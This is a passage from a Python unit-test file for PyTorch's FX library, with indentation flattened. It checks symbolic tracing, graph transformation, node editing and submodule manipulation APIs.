result = interp.run(torch.ones(3, 4), torch.ones(3, 4), torch.rand(3, 4))
self.assertEqual(result, torch.ones(3, 4) * 2.0)
@skipIfNoTorchVision
def test_interpreter_noop_resnet18(self):
rn18 = torchvision_models.resnet18()
transformed = torch.fx.Transformer(symbolic_trace(rn18)).transform()
inp = torch.randn(5, 3, 224, 224)
self.assertEqual(transformed(inp), rn18(inp))
@skipIfNoTorchVision
def test_interpreter_gc_values(self):
rn18 = torchvision_models.resnet18()
interp = Interpreter(symbolic_trace(rn18))
inp = torch.rand(5, 3, 224, 224)
out = interp.run(inp)
env_key_names = set(n.name for n in interp.env.keys())
self.assertEqual(env_key_names, set(['output']))
def test_transformer_noop(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
m = MyModule()
gm = torch.fx.symbolic_trace(m)
new_gm = Transformer(gm).transform()
input = torch.randn(3, 4)
self.assertEqual(new_gm(input), gm(input))
def test_transformer_op_swap(self):
def fn(x):
return torch.sigmoid(x).neg()
gm = torch.fx.symbolic_trace(fn)
class NegSigmSwapXformer(Transformer):
def call_function(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == torch.sigmoid:
return torch.neg(*args, **kwargs)
return super().call_function(n)
def call_method(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == 'neg':
call_self, *args_tail = args
return call_self.sigmoid(*args_tail, **kwargs)
return super().call_method(n)
transformed = NegSigmSwapXformer(gm).transform()
input = torch.randn(3, 4)
self.assertEqual(transformed(input), torch.neg(input).sigmoid())
def test_transformer_multi_outputs(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
x = x + self.param
out = self.linear(x)
return x, out
m = MyModule()
gm = torch.fx.symbolic_trace(m)
new_gm = Transformer(gm).transform()
input = torch.randn(3, 4)
self.assertEqual(new_gm(input), gm(input))
def test_fn_type_annotations(self):
class Foo(torch.nn.Module):
def forward(self, p : Pair, z : torch.Tensor, i : int) -> Dict[str, torch.Tensor]:
return {'a': p.x + p.y + z + i}
foo_scripted = torch.jit.script(Foo())
foo_scripted(Pair(torch.rand(5), torch.rand(5)), torch.rand(5), 3)
fxed = symbolic_trace(Foo())
fxed_scripted = torch.jit.script(fxed)
fxed_scripted(Pair(torch.rand(5), torch.rand(5)), torch.rand(5), 3)
def test_fn_type_annotation_empty(self):
def forward(a : List[torch.Tensor]):
return a[0]
torch.jit.script(symbolic_trace(forward))
def test_wrapped_method(self):
def wrap_with_relu(fn):
@functools.wraps(fn)
def wrapper(*args, **kwargs):
return torch.relu(fn(*args, **kwargs))
return wrapper
class Foo(torch.nn.Module):
@wrap_with_relu
def forward(self, x, w):
return torch.matmul(x, w)
f = Foo()
traced = symbolic_trace(f)
x, w = torch.rand(3, 4), torch.rand(4, 4)
self.assertTrue(any(n.target == torch.relu for n in traced.graph.nodes))
def test_empty_graph_codegen(self):
graph = torch.fx.Graph()
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
self.assertEqual(gm(), None)
def test_sequential(self):
m = torch.nn.Sequential(torch.nn.Conv2d(1, 1, 1))
gm = torch.fx.symbolic_trace(m)
gm_copy = copy.deepcopy(gm)
def test_ctx_mgr(self):
@contextlib.contextmanager
def do_nothing():
yield
class M(torch.nn.Module):
def __init__(self):
super().__init__()
@do_nothing()
def forward(self, x):
return torch.relu(x)
m = M()
self.checkGraphModule(m, (torch.rand(3, 4),))
def test_typename_print(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,),
type_expr=List[float])
output : torch.fx.Node = graph.output(b)
self.assertTrue('typing.List[float]' in str(graph))
def test_layout(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, x):
return torch.empty_like(x, layout=torch.strided, pin_memory=False).fill_(0)
traced = symbolic_trace(M())
x = torch.rand(5, 9, 3, 4)
self.assertEqual(traced(x), torch.zeros_like(x))
def test_ellipsis(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, x, y):
return x + y[:, 1:10, ...]
traced = symbolic_trace(M())
x, y = torch.rand(5, 9, 3, 4), torch.rand(5, 15, 3, 4)
self.assertEqual(traced(x, y), x + y[:, 1:10, ...])
def test_inf_nan(self):
class FooMod(torch.nn.Module):
def forward(self, x):
return x + float('inf'), x + float('-inf'), x + float('nan')
fm = FooMod()
self.checkGraphModule(fm, (torch.rand(3, 4),))
def test_inf_nan_kwds(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', operator.add, (x, float('inf')), {}, name='inf')
c : torch.fx.Node = graph.create_node('call_function', operator.add, (x, float('nan')), {}, name='nan')
graph.output((b, c))
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
x = torch.rand(3, 4)
self.assertEqual(gm(x), (x + float('inf'), x + float('nan')))
def test_deepcopy_recursion_depth(self):
depth = sys.getrecursionlimit() + 20
g = torch.fx.Graph()
x = g.placeholder('x')
for i in range(depth):
x = g.call_function(torch.relu, (x,))
g.output(x)
copied_graph = copy.deepcopy(g)
val_map = {}
for orig_node, new_node in zip(g.nodes, copied_graph.nodes):
val_map[orig_node] = new_node
for orig_node, new_node in zip(g.nodes, copied_graph.nodes):
orig_users = set(orig_node.users.keys())
orig_users_equiv = set(val_map[u] for u in orig_users)
new_users = set(new_node.users.keys())
self.assertEqual(orig_users_equiv, new_users)
@skipIfNoTorchVision
def test_replace_uses(self):
rn18 = torchvision_models.resnet18()
class LowerReluTracer(torch.fx.Tracer):
def is_leaf_module(self, m : torch.nn.Module, qualname : str):
if isinstance(m, torch.nn.ReLU):
return False
return super().is_leaf_module(m, qualname)
rn18_traced = GraphModule(rn18, LowerReluTracer().trace(rn18))
to_erase = []
for node in rn18_traced.graph.nodes:
if node.op == 'call_function' and node.target in [torch.relu, torch.nn.functional.relu]:
kwargs = node.kwargs.copy()
# Neg doesn't have in-place
kwargs.pop('inplace')
with rn18_traced.graph.inserting_before(node):
new_node = rn18_traced.graph.call_function(
the_function=torch.neg, args=node.args, kwargs=node.kwargs)
node.replace_all_uses_with(replace_with=new_node)
to_erase.append(node)
for node in to_erase:
rn18_traced.graph.erase_node(node)
def test_replace_input(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
y : torch.fx.Node = graph.create_node('placeholder', 'y')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
b.replace_input_with(x, y)
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
input_x = torch.randn(33, 44)
input_y = torch.randn(11, 22)
self.assertEqual(gm(input_x, input_y), torch.relu(input_y))
def test_insertion_point(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
with graph.inserting_before(b):
neg : torch.fx.Node = graph.call_function(the_function=torch.neg, args=(x,))
_, *relu_args = b.args
b.args = (neg, *relu_args)
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
input = torch.randn(33, 44)
self.assertEqual(gm(input), torch.relu(torch.neg(input)))
def test_update_args_api(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
y : torch.fx.Node = graph.create_node('placeholder', 'y')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
orig_gm = torch.fx.GraphModule(torch.nn.Module(), graph)
inp_x, inp_y = torch.randn(5, 3), torch.randn(3, 5)
self.assertEqual(orig_gm(inp_x, inp_y), torch.relu(inp_x))
b.update_arg(0, y)
new_gm = torch.fx.GraphModule(torch.nn.Module(), graph)
self.assertEqual(new_gm(inp_x, inp_y), torch.relu(inp_y))
def test_update_kwargs_api(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
y : torch.fx.Node = graph.create_node('placeholder', 'y')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, kwargs={'input': x})
output : torch.fx.Node = graph.output(b)
orig_gm = torch.fx.GraphModule(torch.nn.Module(), graph)
inp_x, inp_y = torch.randn(5, 3), torch.randn(3, 5)
self.assertEqual(orig_gm(inp_x, inp_y), torch.relu(inp_x))
b.update_kwarg('input', y)
new_gm = torch.fx.GraphModule(torch.nn.Module(), graph)
self.assertEqual(new_gm(inp_x, inp_y), torch.relu(inp_y))
def test_move_before(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
neg : torch.fx.Node = graph.call_function(the_function=torch.neg, args=(x,))
_, *relu_args = b.args
b.args = (neg, *relu_args)
b.prepend(neg)
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
input = torch.randn(33, 44)
self.assertEqual(gm(input), torch.relu(torch.neg(input)))
def test_erase_node_error(self):
st = SimpleTest()
traced = symbolic_trace(st)
for node in traced.graph.nodes:
# Test deleting with uses both in another Node and at the output
if node.target in [operator.add, torch.relu]:
with self.assertRaisesRegex(RuntimeError, 'but it still had .* users in the graph'):
traced.graph.erase_node(node)
def test_copy_it(self):
d = immutable_dict([(3, 4), (5, 6)])
l = immutable_list([(3, 4), (5, 6)])
self.assertEqual(d, deepcopy(d))
self.assertEqual(l, deepcopy(l))
def test_get_torch_func_signature(self):
for key in dir(torch):
obj = getattr(torch, key)
if callable(obj):
schemas = get_signature_for_torch_op(obj)
def test_find_uses(self):
graph = torch.fx.Graph()
x = torch.fx.Proxy(graph.placeholder('x'))
y = torch.relu(x)
z = x + x
u = torch.neg(x)
graph.output((y + z + u).node)
graph.lint()
users_of_x = x.node.users
self.assertEqual(len(users_of_x), 3)
expected_ops = set(['relu', 'add', 'neg'])
for use in users_of_x:
assert any(use.name.startswith(prefix) for prefix in expected_ops)
def test_inline_graph(self):
class InlineInto(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
class ToInline(torch.nn.Module):
def forward(self, x):
return torch.neg(x)
inline_into = symbolic_trace(InlineInto())
to_inline = symbolic_trace(ToInline())
combined_graph = torch.fx.Graph()
output_node = combined_graph.graph_copy(inline_into.graph, {})
input_node = list(to_inline.graph.nodes)[0]
assert input_node and input_node.op == 'placeholder'
val_map = {input_node : output_node}
output = combined_graph.graph_copy(to_inline.graph, val_map)
combined_graph.output(output)
combined_module = torch.fx.GraphModule(torch.nn.Module(), combined_graph)
input = torch.rand(3, 4)
self.assertEqual(combined_module(input), input.relu().neg())
def test_multi_insert_point(self):
graph = torch.fx.Graph()
x = torch.fx.Proxy(graph.placeholder('x'))
relu = torch.relu(x)
with graph.inserting_before(relu.node):
y = torch.neg(x)
z = torch.tanh(y)
graph.output((relu.node, z.node))
graph.lint()
expected_ops = ['x', 'neg', 'tanh', 'relu']
for node, expected in zip(graph.nodes, expected_ops):
assert expected in node.name
def test_reassign_args_kwargs_uses(self):
graph = torch.fx.Graph()
x, y = Proxy(graph.placeholder('x')), Proxy(graph.placeholder('y'))
z = x + y
zed = z + z + z
graph.output(zed.node)
graph.lint()
# zed = z + z + z -> zed = z + z + x
zed.node.args = (zed.node.args[0], x.node)
self.assertEqual(x.node.users.keys(), [z.node, zed.node])
# z = x + y -> z = y + y
z.node.args = (y.node, y.node)
self.assertEqual(x.node.users.keys(), [zed.node])
def test_trace_function(self):
def foo(x, y):
return torch.relu(x) + y
x, y = torch.randn(3, 4), torch.randn(3, 4)
self.checkGraphModule(foo, (x, y))
def test_trace_dict_int_keys(self):
class ModWithDictArg(torch.nn.Module):
def forward(self, d : Dict[int, torch.Tensor]):
return d[42]
class CallsModWithDict(torch.nn.Module):
def __init__(self):
super().__init__()
self.m = ModWithDictArg()
def forward(self, x):
return self.m({42: x})
class MyTracer(torch.fx.Tracer):
def is_leaf_module(self, m: torch.nn.Module, module_qualified_name : str) -> bool:
return isinstance(m, ModWithDictArg)
traced_graph = MyTracer().trace(CallsModWithDict())
def test_trace_dict_proxy_keys(self):
class ModWithDictArg(torch.nn.Module):
def forward(self, d : Dict[torch.Tensor, torch.Tensor]):
return d[42]
class CallsModWithDict(torch.nn.Module):
def __init__(self):
super().__init__()
self.m = ModWithDictArg()
def forward(self, x):
return self.m({x: x})
class MyTracer(torch.fx.Tracer):
def is_leaf_module(self, m: torch.nn.Module, module_qualified_name : str) -> bool:
return isinstance(m, ModWithDictArg)
with self.assertRaisesRegex(RuntimeError, 'cannot contain a Node'):
traced_graph = MyTracer().trace(CallsModWithDict())
def test_module_deepcopy_edit_nodes(self):
class Foo(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
traced1 = symbolic_trace(Foo())
copied = copy.deepcopy(traced1)
for node in copied.graph.nodes:
if node.target == torch.relu:
node.target = torch.neg
copied.recompile()
traced1.recompile()
x = torch.randn(15, 15)
torch.testing.assert_allclose(traced1(x), torch.relu(x))
torch.testing.assert_allclose(copied(x), torch.neg(x))
def test_direct_param_use(self):
class TransposeTest(torch.nn.Module):
def __init__(self):
super().__init__()
self.b = torch.nn.Parameter(torch.rand(4, 3))
def forward(self, x):
return self.b
class Foo(torch.nn.Module):
def __init__(self):
super().__init__()
self.a = TransposeTest()
def forward(self, x):
return self.a.b, self.a.b.t(), self.a.b.view(12)
traced = torch.fx.symbolic_trace(Foo())
assert(all('constant' not in node.target for node in traced.graph.nodes))
def test_single_default_arg(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, y=1):
return y
m = M()
self.checkGraphModule(m, ())
self.checkGraphModule(m, (3,))
def test_multiple_default_args(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, y=1, z=2):
return y + z
m = M()
self.checkGraphModule(m, ())
self.checkGraphModule(m, (3,))
self.checkGraphModule(m, (3, 4))
def test_regular_and_default_args(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, x, y=1):
return x + y
m = M()
self.checkGraphModule(m, (2,))
self.checkGraphModule(m, (2, 3))
def test_string_literal_return(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self):
return "foo"
m = M()
self.checkGraphModule(m, ())
def test_namedtuple_return_qualname(self):
class NamedTupReturn(torch.nn.Module):
def forward(self, x):
return MyNamedTup(x, x)
traced = symbolic_trace(NamedTupReturn())
input = torch.rand(3, 4)
self.assertEqual(traced(input), MyNamedTup(input, input))
def test_update_args_kwargs_yells_at_you(self):
symtraced = symbolic_trace(SimpleTest())
node = next(iter(symtraced.graph.nodes))
with self.assertRaisesRegex(AttributeError, '__update_args_kwargs'):
node.__update_args_kwargs((), {})
def test_torchbind_class_attribute_in_fx(self):
if TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS:
self.skipTest("torch.classes._TorchScriptTesting._StackString is registered, skipping")
class FooBar1234(torch.nn.Module):
def __init__(self):
super(FooBar1234, self).__init__()
self.f = torch.classes._TorchScriptTesting._StackString(["3", "4"])
def forward(self):
return self.f.top()
m = FooBar1234()
self.checkGraphModule(m, ())
def test_torchbind_class_attribute_in_fx_tensor_arg(self):
if TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS:
self.skipTest("torch.classes._TorchScriptTesting._ReLUClass is registered, skipping")
class FooBar2341(torch.nn.Module):
def __init__(self):
super(FooBar2341, self).__init__()
self.f = torch.classes._TorchScriptTesting._ReLUClass()
def forward(self, x):
return self.f.run(x)
m = FooBar2341()
traced = symbolic_trace(m)
input = torch.randn(3, 4)
self.assertEqual(traced(input), m(input))
self.assertTrue(any(n.op == 'call_method' for n in traced.graph.nodes))
def test_script_method_trace(self):
class Scripted(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
class Holder(torch.nn.Module):
def __init__(self):
super().__init__()
self.s = torch.jit.script(Scripted())
def forward(self, x):
return self.s(x)
h = Holder()
traced = symbolic_trace(h)
input = torch.randn(3, 4)
self.assertEqual(traced(input), h(input))
self.assertTrue(any(n.op == 'call_method' for n in traced.graph.nodes))
def test_namedtuple_return_trace(self):
class NamedTupReturn(torch.nn.Module):
def forward(self, x):
return Pair(x, x)
traced = symbolic_trace(NamedTupReturn())
input = torch.rand(3, 4)
self.assertEqual(traced(input), Pair(input, input))
def test_return_type_exists(self):
class ReturnTypeModule(torch.nn.Module):
def other(self, x: List[str]) -> List[str]:
return x
def forward(self, x: List[str]) -> List[str]:
return self.other(x)
traced = symbolic_trace(ReturnTypeModule())
self.assertIn("-> typing_List[str]", traced._code)
scripted = torch.jit.script(traced)
self.assertIn("-> List[str]", scripted.code)
def getitem_inner(self):
class GetItemBase(torch.nn.Module):
def __init__(self):
super().__init__()
self.register_buffer('pe', torch.randn(8, 8))
class GetItem1(GetItemBase):
def forward(self, x):
return self.pe[:, :x.size(0)]
class GetItem2(GetItemBase):
def forward(self, x):
return self.pe[x.size(0)]
class GetItem3(GetItemBase):
def forward(self, x):
return self.pe[4] # fx creates `self._tensor_constant0` here
self.checkGraphModule(GetItem1(), [torch.zeros(4)])
self.checkGraphModule(GetItem2(), [torch.zeros(4)])
self.checkGraphModule(GetItem3(), [torch.zeros(4)])
@unittest.skipUnless(os.environ.get("FX_PATCH_GETITEM") == "1",
"Will be checked in test_getitem_subproc")
def test_getitem(self):
self.getitem_inner()
def test_getitem_subproc(self):
# need to run this test in a subproc to work around:
# https://github.com/pytorch/pytorch/issues/50710
proc = Process(target=run_getitem_target)
proc.start()
proc.join()
self.assertEqual(proc.exitcode, 0)
def test_user_friendly_call_provenance_with_function(self):
def fn(x):
return wrapper_fn(x)
traced = torch.fx.symbolic_trace(fn)
with self.assertRaisesRegex(RuntimeError, "'wrapper_fn' is "
"being compiled since it was called"
" from 'fn.forward'"):
scripted = torch.jit.script(traced)
def test_user_friendly_call_provenance_with_module(self):
class M(torch.nn.Module):
def forward(self, x):
return wrapper_fn(x)
traced = torch.fx.symbolic_trace(M())
with self.assertRaisesRegex(RuntimeError, "'wrapper_fn' is "
"being compiled since it was called"
" from 'M.forward'"):
scripted = torch.jit.script(traced)
def test_snake_case(self):
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.activations = torch.nn.ModuleDict([
["snake_case", torch.nn.ReLU()],
["PascalCase", torch.nn.LeakyReLU()],
["ALL_CAPS", torch.nn.PReLU()]
])
def forward(self, x):
a = self.activations["snake_case"](x)
b = self.activations["PascalCase"](x)
c = self.activations["ALL_CAPS"](x)
return a, b, c
traced = symbolic_trace(M())
check = [
("activations_snake_case", "activations.snake_case"),
("activations_pascal_case", "activations.PascalCase"),
("activations_all_caps", "activations.ALL_CAPS")
]
i = 0
for node in traced.graph.nodes:
if node.op == "placeholder" or node.op == "output":
continue
name = check[i][0]
target = check[i][1]
self.assertEqual(name, node.name)
self.assertEqual(target, node.target)
i += 1
self.assertEqual(i, 3)
def test_no_mutation(self):
from torch.fx.immutable_collections import immutable_list
x = immutable_list([3, 4])
with self.assertRaisesRegex(NotImplementedError, "new_args"):
x[0] = 4
def test_partial_trace(self):
class Foo(torch.nn.Module):
def forward(self, x, y):
if y:
return 2 * x
else:
return x
mod = Foo()
mod_true = symbolic_trace(mod, concrete_args={'y': True})
mod_false = symbolic_trace(mod, concrete_args={'y': False})
self.assertEqual(mod_true(3, True), 6)
print(mod_true.code)
assert(any([i.target == torch._assert for i in mod_true.graph.nodes]))
with self.assertRaises(AssertionError):
mod_true(3, False)
self.assertEqual(mod_false(3, False), 3)
with self.assertRaises(AssertionError):
mod_false(3, True)
def f_higher(a, f):
return f(a)
nf = symbolic_trace(f_higher, concrete_args={'f': lambda x: x * 2})
self.assertEqual(nf(3, lambda x: x * 2), 6)
def test_custom_traceback_raised_when_exception_source_is_graphmodule(self):
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.W = torch.nn.Parameter(torch.randn(5))
def forward(self, x):
return torch.dot(self.W, x)
traced = torch.fx.symbolic_trace(M())
out = [n for n in traced.graph.nodes if n.op == "output"][-1]
with traced.graph.inserting_before(out):
relu_out = traced.graph.call_method(method_name='relu',
args=(out.args[0],))
out.args = (relu_out,)
traced.recompile()
with self.capture_stderr() as captured:
with self.assertRaises(TypeError):
traced(5)
self.assertRegex(captured[0],
r"Call using an FX-traced Module, line .* of the "
r"traced Module's generated forward function:")
def test_custom_traceback_not_raised_when_exception_source_is_submodule(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
self.linear = torch.nn.Linear(3, 4)
def forward(self, x):
return self.linear(x)
traced = torch.fx.symbolic_trace(M())
# Do not change this to `capture_stderr` or another context
# manager without ensuring that the output is as expected
try:
traced(torch.rand(5, 5))
except RuntimeError:
captured = traceback.format_exc()
self.assertNotRegex(captured,
r"Call using an FX-traced Module, line .* of the "
r"traced Module's generated forward function:")
def test_graph_module_replicate_for_dp(self):
class Foo(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
gm = torch.fx.symbolic_trace(Foo())
x = torch.randn(5, 3)
out = gm(x)
replica = gm._replicate_for_data_parallel()
out_replica = replica(x)
torch.testing.assert_allclose(out_replica, out)
def test_ast_rewriter_rewrites_assert(self):
class M(torch.nn.Module):
def forward(self, x: torch.Tensor, y: int, z: int):
assert y == z
return torch.add(x, x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
traced.graph.lint()
def test_ast_rewriter_rewrites_assert_with_message(self):
class M(torch.nn.Module):
def forward(self, x: torch.Tensor, y: int, z: int):
assert y == z, "msg"
return torch.add(x, x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
traced.graph.lint()
def test_throw_out_variant(self):
def foo(x):
y = torch.rand_like(x)
torch.sigmoid(x, out=y)
return y
class MyTracer(torch.fx.Tracer):
check_mutable_operations = True
tracer = MyTracer()
with self.assertRaisesRegex(RuntimeError, 'mutable operation aten::sigmoid.out'):
traced_graph = tracer.trace(foo)
def test_ast_rewriter_reassigns_submodules(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
self.bn = torch.nn.BatchNorm2d(100)
def forward(self, x: torch.Tensor):
return torch.add(x, x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
traced.graph.lint()
def test_ast_rewriter_wrap(self):
self.assertEqual(3 + 4 + 5, a_lifted_leaf((3, 4), 5))
def to_trace(y):
return (
a_lifted_leaf((4, y), 3)
+ a_lifted_leaf((3, 4), 5)
+ a_lifted_leaf((y, y), y)
)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(to_trace)
traced = GraphModule(ast_rewriter.root, graph, "gm")
self.assertIn("a_lifted_leaf", traced.code)
self.assertEqual(27, traced(2))
self.assertIs(a_lifted_leaf, real_a_lifed_leaf)
def test_ast_rewriter_wrap_fn_directly(self):
self.assertEqual(3 + 4 + 5, a_lifted_leaf2((3, 4), 5))
def to_trace(y):
return (
a_lifted_leaf2((4, y), 3)
+ a_lifted_leaf2((3, 4), 5)
+ a_lifted_leaf2((y, y), y)
)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(to_trace)
traced = GraphModule(ast_rewriter.root, graph, "gm")
self.assertIn("a_lifted_leaf2", traced.code)
self.assertEqual(27, traced(2))
self.assertIs(a_lifted_leaf2, real_a_lifed_leaf2)
def test_profiler_ranges_side_effect(self):
g = torch.fx.Graph()
handle = g.call_function(torch.ops.profiler._record_function_enter, ('test_range',))
g.call_function(torch.ops.profiler._record_function_exit, (handle,))
g.output(None)
found_targets = {}
for node in g.nodes:
if node.op == 'call_function':
found_targets.setdefault(node.target)
self.assertEqual(
found_targets.keys(), [torch.ops.profiler._record_function_enter, torch.ops.profiler._record_function_exit])
g.eliminate_dead_code()
found_targets = {}
for node in g.nodes:
if node.op == 'call_function':
found_targets.setdefault(node.target)
self.assertEqual(
found_targets.keys(), [torch.ops.profiler._record_function_enter, torch.ops.profiler._record_function_exit])
def test_ast_rewriter_wrapped_via_decorator(self):
class F(torch.nn.Module):
def forward(self, x):
return wrapped_via_decorator(x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(F())
traced = GraphModule(ast_rewriter.root, graph, "gm")
self.assertIn("wrapped_via_decorator", traced.code)
self.assertEqual(traced(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
def test_ast_rewriter_wrapped_via_decorator_and_transformed(self):
self.assertEqual(wrapped_via_decorator(0), 1)
def to_trace(y):
return wrapped_via_decorator(y)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(to_trace)
traced = GraphModule(ast_rewriter.root, graph, "gm")
self.assertIn("wrapped_via_decorator", traced.code)
self.assertEqual(traced(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
transformed = torch.fx.Transformer(traced).transform()
self.assertIn("wrapped_via_decorator", transformed.code)
self.assertEqual(transformed(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
def test_ast_rewriter_wrap_with_submodule(self):
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.batchnorm1d = torch.nn.BatchNorm1d(2, affine=False)
def forward(self, x: torch.Tensor):
return wrapped_with_submodule(x, self.batchnorm1d)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
self.assertIn("wrapped_with_submodule", traced.code)
input = torch.rand(3, 2)
ref_batchnorm1d = torch.nn.BatchNorm1d(2, affine=False)
self.assertEqual(ref_batchnorm1d(input), traced(input))
def test_submodule_manipulation_API(self):
class C(torch.nn.Module):
def __init__(self):
super(C, self).__init__()
self.conv = torch.nn.Conv2d(16, 33, 3, stride=2)
self.param = torch.nn.Parameter(torch.rand(2, 3))
def forward(self, x):
return self.conv(torch.cat([self.param, x]))
class B(torch.nn.Module):
def __init__(self):
super(B, self).__init__()
self.linear = torch.nn.Linear(100, 200)
self.register_buffer("buf", torch.randn(2, 3))
self.net_c = C()
def forward(self, x):
return self.linear(torch.cat([self.buf, self.net_c(x)]))
class A(torch.nn.Module):
def __init__(self):
super(A, self).__init__()
self.net_b = B()
self.param = torch.nn.Parameter(torch.rand(2, 3))
def forward(self, x):
return self.net_b(x) + self.param
a = symbolic_trace(A())
a.add_submodule("net_b.net_c.dropout", torch.nn.Dropout(p=0.2))
conv = [n for n in a.graph.nodes if n.target == "net_b.net_c.conv"][-1]
with a.graph.inserting_before(conv):
with warnings.catch_warnings(record=True) as w:
dropout = a.graph.call_module(module_name="net_b.net_c.dropout",
args=conv.args)
self.assertEqual(len(w), 0)
conv.replace_all_uses_with(dropout)
a.graph.erase_node(conv)
a.recompile()
def module_exists(gm: GraphModule, path: str) -> bool:
return any(path == name for name, _ in gm.named_modules())
def parameter_exists(gm: GraphModule, path: str) -> bool:
return (any(path == name for name, _ in gm.named_parameters())
and any(path == name for name in gm.state_dict().keys()))
def buffer_exists(gm: GraphModule, path: str) -> bool:
return (any(path == name for name, _ in gm.named_buffers())
and any(path == name for name in gm.state_dict().keys()))
# Test that we added the "dropout" submodule
self.assertTrue(module_exists(a, "net_b.net_c.dropout"))
# Test `get_submodule` with an added submodule
self.assertIsNotNone(a.get_submodule("net_b.net_c.dropout"))
# Test that the "conv" submodule is still there
self.assertTrue(module_exists(a, "net_b.net_c.conv"))
# Test `get_submodule` with an original module
self.assertIsNotNone(a.get_submodule("net_b.net_c.conv"))
# Test that the "conv" node is NOT still there
conv = [n for n in a.graph.nodes if n.target == "net_b.net_c.conv"]
self.assertEqual(conv, [])
a.delete_submodule("net_b.net_c.conv")
# Test that the "conv" submodule is now gone
self.assertFalse(module_exists(a, "net_b.net_c.conv"))
# Test `get_submodule` with a deleted submodule
with self.assertRaisesRegex(AttributeError, "has no attribute "
"`conv`"):
self.assertIsNone(a.get_submodule("net_b.net_c.conv"))
# Test `get_attr` warnings
cat = [n for n in a.graph.nodes if n.target == torch.cat][-1]
with a.graph.inserting_before(cat):
with warnings.catch_warnings(record=True) as w:
param = a.graph.get_attr(qualified_name="net_b.net_c.param")
self.assertEqual(len(w), 0)
with self.assertWarnsRegex(UserWarning, "Attempted to "
"insert a get_attr Node with no "
"underlying reference in the "
"owning GraphModule"):
bad_param = a.graph.get_attr(qualified_name="net_b.param")
a.graph.erase_node(bad_param)
cat.args = (*cat.args, param)
a.recompile()
a.graph.lint()
# Test `get_parameter`
a.get_parameter("net_b.net_c.param")
with self.assertRaisesRegex(AttributeError, "is not an "
"nn.Parameter"):
a.get_parameter("net_b.buf")
with self.assertRaisesRegex(AttributeError, "has no attribute "
"`param`"):
a.get_parameter("net_b.param")
# Test `get_buffer`
a.get_buffer("net_b.buf")
with self.assertRaisesRegex(AttributeError, "is not a "
"buffer"):
a.get_buffer("net_b.net_c.param")
with self.assertRaisesRegex(AttributeError, "has no attribute "
"`buf`"):
a.get_buffer("net_b.net_c.buf")
# Test non-nested attributes
a.get_submodule("")
a.get_parameter("param")
# Insert some unused submodules
